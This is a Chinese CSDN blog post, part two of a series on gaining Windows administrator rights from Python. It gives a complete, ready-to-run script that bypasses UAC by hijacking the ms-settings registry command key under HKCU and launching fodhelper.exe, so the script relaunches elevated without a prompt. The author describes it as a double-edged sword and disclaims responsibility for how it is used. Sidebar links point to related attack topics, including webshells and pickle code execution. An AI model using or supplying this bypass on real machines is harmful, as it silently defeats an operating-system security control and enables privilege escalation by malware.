python如果获取windows管理员权限(二)

最新推荐文章于 2024-01-27 21:29:07 发布
最新推荐文章于 2024-01-27 21:29:07 发布
阅读量3.7w 收藏 120
点赞数 18
分类专栏: Security 文章标签: python 管理员权限
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_17550379/article/details/79006718
版权

我们在python如果获取windows管理员权限(一)中谈到了UAC的问题。

很多时候我们不希望我们的软件弹出UAC提示,这个时候我们可以通过注册表的方法去解决。这其实已经不在是一个安全的编程了,它变成了一把双刃剑。

当然我们只是讨论这种问题该怎么解决。具体用在什么方面那是你的问题咯!

通过下面的代码我们可以轻松绕过UAC

# -*- coding: utf-8 -*-
"""
Created on Mon Jan  8 09:09:51 2018

@author: coordinate
"""
from __future__ import print_function
import os
import sys
import ctypes
if sys.version_info[0] == 3:
    import winreg as winreg
else:
    import _winreg as winreg
    
CMD                   = r"C:\Windows\System32\cmd.exe"
FOD_HELPER            = r'C:\Windows\System32\fodhelper.exe'
PYTHON_CMD            = "python"
REG_PATH              = 'Software\Classes\ms-settings\shell\open\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'

def is_admin():
    '''
    Checks if the script is running with administrative privileges.
    Returns True if is running as admin, False otherwise.
    '''    
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False
    
def create_reg_key(key, value):
    '''
    Creates a reg key
    '''
    try:        
        winreg.CreateKey(winreg.HKEY_CURRENT_USER, REG_PATH)
        registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_PATH, 0, winreg.KEY_WRITE)                
        winreg.SetValueEx(registry_key, key, 0, winreg.REG_SZ, value)        
        winreg.CloseKey(registry_key)
    except WindowsError:        
        raise
        
def bypass_uac(cmd):
    '''
    Tries to bypass the UAC
    '''
    try:
        create_reg_key(DELEGATE_EXEC_REG_KEY, '')
        create_reg_key(None, cmd)    
    except WindowsError:
        raise
        
def execute():        
    if not is_admin():
        print('[!] The script is NOT running with administrative privileges')
        print('[+] Trying to bypass the UAC')
        try:                
            current_dir = __file__
            cmd = '{} /k {} {}'.format(CMD, PYTHON_CMD, current_dir)
            bypass_uac(cmd)                
            os.system(FOD_HELPER)                
            sys.exit(0)                
        except WindowsError:
            sys.exit(1)
    else:
        #这里添加我们需要管理员权限的代码
        print('[+] The script is running with administrative privileges!')  
        
if __name__ == '__main__':
    execute()

其实我们这个代码这里主要是往注册表中添加了这两项

coordinate_blog
关注
  • 18
    点赞
  • 120
    收藏
    觉得还不错? 一键收藏
  • 16
    评论
专栏目录
netdrive:Windows平台中每个帐户用于获取Netdrive使用情况的工具
05-06
网盘 Windows平台中每个帐户用于获取Netdrive使用情况的工具。 用法 主要功能在python扩展中找到:netuse python setup.py build 或者,您可以使用自己喜欢的方式来构建netuse.c,获取扩展名netuse。 它导出以下功能: autoConnect() 从共享文件夹创建映射的驱动器,它使用默认用户名。 (由过程的用户上下文提供。) 如果出现问题,请引发异常。 listNetDrive() 列出当前用户可见的所有网络驱动器。 返回列表: [ (drive, remote, status, user), ... ] 并不是说,如果调用应用程序在与建立连接的应用程序不同的登录会话中运行,则对于当前应用程序而言,它是不可见的。 如果当前用户具有管理员权限,则可以显示这些连接,但是状态不可用或未连接。 请参阅定义MS-DOS设备名称
Python完成Windows下端口转发
04-10
Python实现简单的端口转发功能,即使用pywin32模块,执行net interface命令实现端口转发,脚本运行可以自动获取管理员全权限。类似的cmd命令均可以由此脚本调用,修改command命令即可。 PS:不知为啥默认5积分。如果真有人下载了,有问题可以发站内私信给我,或直接评论,pywin32相关问题可以讨论
Python 获取管理员权限
最新发布
JSHS_123456的博客
01-27 905
"代码块中,我们首先检查当前用户是否具有管理员权限,如果没有,则使用ShellExecute函数重新以管理员身份运行脚本。在这个示例中,is_admin函数用于检查当前用户是否具有管理员权限。如果没有管理员权限,则使用ShellExecuteW函数调用Windows API,使用管理员权限重新运行脚本。现在让我们来看一个示例场景,假设我们需要修改Windows系统的注册表项,这个操作需要管理员权限才能执行。在这个示例中,我们定义了一个set_registry_value函数,用于修改注册表项的值。
songdetails:名为“songdetails”的纯 Python 包,在 FreeBSD 许可下许可。 可以更新和检索歌曲详细信息,例如艺术家、标题、专辑、时长...使用 pytagger 和 mpeg1audio,目前仅支持的文件类型为 MP3
06-15
Python包songdetails 用于检索计算机中歌曲详细信息的纯 Python 包。 主要目的是为更新和检索信息提供最简单的界面。 例如多个同名帧的ID3功能不是默认的,默认是单首歌曲最有可能有单个艺术家、标题、专辑名称等。 你到底为什么要创建另一个标记器的东西? 只是似乎没有任何像样的标记程序获得免费使用许可,那些免费的标记程序受 GPL 保护,这对大多数项目来说都是禁忌。 终端用户 依赖关系 注意:这两个依赖项都是纯python 包。 安装 记得先获取上面的依赖。 这个包使用distutils并且使用它很容易安装: $ setup.py install 在 Windows 下,您可以使用管理员权限启动命令提示符(通过右键单击cmd.exe并使用“以管理员身份运行”),然后运行上述命令。 用法示例: >>> import songdetails >>> song =
python弹窗获取ZBID-UIACCESS权限超级置顶dll,可覆盖于win10置顶的任务管理器之上
06-12
1.python可调用dll,使弹窗获取超级置顶权限ZBID_UIACCESS,位于置顶任务管理器之上。 当前对外提供的接口弹窗置顶都无法超越win10任务管理器 2.使用方法 dll文件全都放在调用的py文件同一目录。 from ctypes import CDLL dll=CDLL('.\\hwtest.dll') isuia = dll.uiastart() print("权限数字"+str(isuia))#isuia为1获取成功,为0获取失败---必须以管理员权限运行
dhcpig:dhcpig
05-08
DHCPig 标签#:DHCP,IPv4,IPv6,耗尽,渗透,模糊测试,安全性 概括 DHCPig发起高级DHCP耗尽攻击。 它将消耗LAN上的所有IP,阻止新用户获取IP,释放任何正在使用的IP,然后很好地发送免费的ARP并使所有Windows主机脱机。 它需要scapy> = 2.1的库和管理员权限才能执行。 无需配置,只需将接口作为参数传递即可。 它已在多个Linux发行版和多个DHCP服务器(ISC,Windows 2k3 / 2k8等)上进行了测试。 执行后,脚本将执行以下操作: 抢先获取邻居IP 如果检测到要约,请侦听来自其他客户端的DHCP请求,并以对该要约的请求进行响应。 请求区域中的所有可用IP地址循环并发送来自不同主机和MAC地址的DHCP请求 查找您的邻居MAC和IP并从DHCP服务器释放其IP 该LAN上所有邻居的ARP,然后将DHCPReleases发
python运行时获取管理员权限
03-06
获取管理员权限执行cmd命令
一个超级厉害的python病毒
cgy091107的博客
05-28 4457
彻底干掉你的Windows
Python获取Windows管理员权限
R_I_P_Avicii的博客
04-17 3059
在查阅博客(Python获取Windows管理员权限)时,我使用的代码并不能获得权限,因而对其产生了好奇。 在尝试过后成功,代码如下: # -*- coding:utf-8 -*- import sys, ctypes, os def __set_run_as_admin(): def is_admin(): try: return ctypes.windll.shell32.IsUserAnAdmin() except: ..
python获取管理员权限
spuerOUTSYSTEM的博客
07-09 7255
1.以管理员运行 cmd 这个方法很简单,也无需多说,右键以管理员运行就可以了,然后在里面运行 python 脚本就有管理员权限了。 2. 用 cmd 脚本获取 假设我要运行的文件是 test.py,则我可以写一个 cmd 脚本,不妨叫做 go.cmd,在里面写入: @echo off %1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.clo
shell-emotions:基于系统状态的命令行动画
04-14
情绪化 基于Linux或Windows 10系统状态的命令行动画 ASCII动画是使用的修改版创建 要求 Linux Python 2或3 psutil 重击或鱼 Windows 10 的Python 3 psutil pythonnet | (可选的) | 注意:OpenHardwareMonitor需要管理员访问权限(可选) 电源外壳 获取ascii框架的工作流程 手动方式 使用将所需的gif动画拆分为帧 使用根据先前创建的图像帧创建ASCII帧 在资产目录中找到图像和ascii框架 终点法 下载 找到要转换为名为“ <insert> ASCII框架的gif 运行-> ./termimation <insert> ./<insert> 添加动画 使用上述工作流程创建ASCII框架,或 将名为0-N的a
pytmipe:Python库和客户端,用于令牌操作和模拟,用于在Windows上进行特权升级
03-21
PYTMIPE和TMIPE PYTMIPE (用于令牌操作的PYthon库和用于特权升级的模拟)是一个Python 3库,用于处理Windows令牌和管理模拟,以便在Windows上获得更多特权。 TMIPE是使用pytmipe库的python 3客户端。 内容 一个python客户端: tmipe ( python3 tmipe.py ) 一个python库: pytmipe 。对于将此项目包含在另一个项目中很有用 pytinstaller示例,用于获取独立的exe 文件 幻灯片“ Windows令牌操作,模拟和特权升级”(英语): MISC 112(法语)中的文章: 主要特点 方法 所需特权 操作系统(无穷举) 直接目标(最大值) 代币创建和模拟 用户名密码 全部 本地管理员 令牌模拟/盗窃 SeDebugPrivilege 全部 nt权限\系统 父PID欺骗(句柄继承) SeD
dfirtriage:用于Windows事件响应的数字取证工具
05-23
垃圾 用于基于Windows的事件响应的数字取证工具。 如何使用 要运行,请将DFIRtriage.exe拖放到目标上并以管理员权限执行。 所有其他必需文件都捆绑在DFIRtriage.exe中。 DFIRTriage v5.0用户手册 描述 本文档概述了DFIRtriage工具的功能和正确使用。 还包括详细信息,以帮助分析输出。 关于 DFIRtriage是旨在向事件响应者提供快速主机数据的工具。 该代码使用Python编写,已编译为消除python对目标主机的依赖性。 该工具将在执行时自动运行各种命令。 所获取的数据将驻留在执行目录的根目录中。 DFIRTriage可以从USB驱动器运行,也可以在目标上的远程外壳中执行。 仅Windows支持。 什么是新的? Powershell事件日志现在使用“ parse all”选项进行解析(-elpa,-evtlogparseall) 添加
解析PyCharm Python运行权限问题
09-18
主要介绍了PyCharm Python运行权限问题,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
python如果获取windows管理员权限(一)
热门推荐
coordinate的博客
01-08 4万+
我们在运行我们编写好的python代码时,会碰到这样的报错问题 PermissionError: [WinError 5] 拒绝访问。 这是因为我们编写的脚本的权限不够。一种解决办法是在管理员cmd中运行我们的脚本(右键以 run as administrator),但是这种办法不够优雅。我们经常看到当我们运行一些需要高权限的软件时,会弹出以下对话框 这被称为用户安全控制,简
关于u盘快捷方式病毒的解决方案
coordinate的博客
10-28 1万+
最近学校的电脑中了病毒,导致上课时u盘插上电脑后,u盘里面的文件全变成了快捷方式。可能是xxx的一个恶作剧吧,但是挺麻烦的。解决方法非常简单@echo off @echo 2017.10.28 by coordinate @echo +-------------------------------------------------------------+ attrib -s -h *. /S /
浅析一句话木马
coordinate的博客
10-01 4962
一开始对于一句话木马感觉很神奇,因为它特别的短,用过的人都知道。分析原理后,又非常想知道到底是什么人想出这么一个好的想法,真的非常的天才。以php一句话为例子<?php eval($_POST[c]); ?>我么将这句话保存为x.php文件上传到网站中,通过菜刀可以轻松连接。 究其原理其实很简单,看下面这个做法,通过对x.php中的c进行post 菜刀的功能无非是把我们要post的数据传
Python Pickle任意代码执行漏洞
coordinate的博客
02-28 1252
我们通常使用pickle将python对象序列化,但是pickle在加载时有一个副作用就是它会自动加载相应模块并构造实例对象。这样就造成了一个很危险的代码,如果被黑客利用的话会造成非常严重的后果。 我首先在python2.7下测试,通过如下代码生成payload import pickle import os class gen(object): def __reduce__(se...
python 代码中获取管理员权限
09-13
Python代码中获取管理员权限,可以通过以下几种方式实现: 1. 使用管理员账户运行Python脚本:以管理员账户权限运行Python脚本可以直接获取管理员权限。可以通过右键点击脚本文件,选择“以管理员身份运行”来执行代码。 2. 使用subprocess模块调用管理员权限的命令行操作:可以使用subprocess模块在Python代码中调用系统命令并获取管理员权限。例如,可以使用subprocess.run()函数调用命令行中需要管理员权限才能执行的操作。 3. 使用ctypes库调用Windows API:对于Windows系统,可以使用ctypes库调用Windows API来获取管理员权限。通过调用相关的API函数,可以创建一个管理员权限的进程。 需要注意的是,获取管理员权限可能涉及到系统安全问题,应当谨慎使用。在某些情况下,操作系统会要求用户输入管理员密码来确认权限提升操作。在编写和运行代码时,应确保操作的合法性和安全性,避免滥用管理员权限导致系统问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值